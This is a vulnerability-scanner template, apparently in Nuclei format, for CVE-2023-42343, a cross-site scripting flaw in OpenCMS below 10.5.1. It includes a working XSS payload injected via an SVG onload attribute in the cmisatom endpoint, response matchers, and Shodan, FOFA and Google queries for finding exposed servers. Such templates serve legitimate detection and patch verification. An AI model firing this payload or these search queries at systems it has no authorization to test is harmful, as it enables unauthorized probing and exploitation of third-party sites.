漏洞描述
OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
CVE-2023-42343: OpenCMS - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2023-42343
info:
name: OpenCMS - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
remediation: Fixed in 10.5.1.
reference:
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
classification:
cve-id: CVE-2023-42343
metadata:
verified: true
max-request: 1
shodan-query:
- "/opencms/"
- http.title:"opencms"
- cpe:"cpe:2.3:a:alkacon:opencms"
product: opencms
vendor: alkacon
fofa-query: title="opencms"
google-query: intitle:"opencms"
tags: cve,cve2023,xss,opencms,vuln
http:
- method: GET
path:
- '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27"><svg%20onload=alert(document.domain)>'
headers:
Content-Type: application/cmisquery+xml
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Apache Chemistry OpenCMIS'
- '<svg onload=alert(document.domain)>'
condition: and
# digest: 4b0a00483046022100b65bae6e861a8bcb4e16ccd3999a163176f1ea605617fd05e2e51fe1d2b250e8022100c8d7d714172e3381811b4055ba3851da99719637d6d57bb270c1e6f8d717b284:922c64590222798bb761d5b6d8e72950